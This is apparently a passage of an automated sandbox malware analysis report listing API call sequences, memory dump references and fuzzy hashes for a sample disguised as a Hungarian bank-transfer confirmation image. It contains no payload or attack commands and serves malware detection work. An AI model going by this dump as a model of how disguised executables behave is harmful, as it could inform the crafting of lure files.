                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3275902921-0
                                                                                                          • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                          • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                          • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                          • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                          APIs
                                                                                                          • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                          • String ID:
                                                                                                          • API String ID: 2833360925-0
                                                                                                          • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                          • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                          • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                          • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32 ref: 004555C7
                                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3691411573-0
                                                                                                          • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                          • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                          • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                          • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                          APIs
                                                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                          • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                          • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                          • EndPath.GDI32(?), ref: 004472D6
                                                                                                          • StrokePath.GDI32(?), ref: 004472E4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                          • String ID:
                                                                                                          • API String ID: 372113273-0
                                                                                                          • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                          • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                          • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                          • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDevice$Release
                                                                                                          • String ID:
                                                                                                          • API String ID: 1035833867-0
                                                                                                          • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                          • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                          • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                          • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 0041708E
                                                                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                          • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                          • __lock.LIBCMT ref: 004170BE
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                          • _free.LIBCMT ref: 004170EE
                                                                                                          • InterlockedIncrement.KERNEL32(02EE17F0), ref: 00417106
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 3470314060-0
                                                                                                          • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                                          • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                          • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                                          • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                          • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                            • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 3495660284-0
                                                                                                          • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                          • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                          • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                          • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                          APIs
                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4278518827-0
                                                                                                          • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                          • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                          • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                          • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                          APIs
                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                                                                          • __freefls@4.LIBCMT ref: 00415209
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                          • String ID:
                                                                                                          • API String ID: 442100245-0
                                                                                                          • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                          • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                          • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                          • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                          • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                          • _wcslen.LIBCMT ref: 0045F94A
                                                                                                          • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 621800784-4108050209
                                                                                                          • Opcode ID: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                                                                                          • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                          • Opcode Fuzzy Hash: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                                                                                          • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                          • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                          • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 3884216118-234962358
                                                                                                          • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                          • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                          • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                          • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                          • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                          • String ID: AU3_GetPluginDetails$#v
                                                                                                          • API String ID: 145871493-3662034293
                                                                                                          • Opcode ID: a0c48202d14957e5928cec6e7014de58bc38a72be84d6b9eb176fbc35b7d0d88
                                                                                                          • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                          • Opcode Fuzzy Hash: a0c48202d14957e5928cec6e7014de58bc38a72be84d6b9eb176fbc35b7d0d88
                                                                                                          • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                          • IsMenu.USER32(?), ref: 0044854D
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                          • DrawMenuBar.USER32 ref: 004485AF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
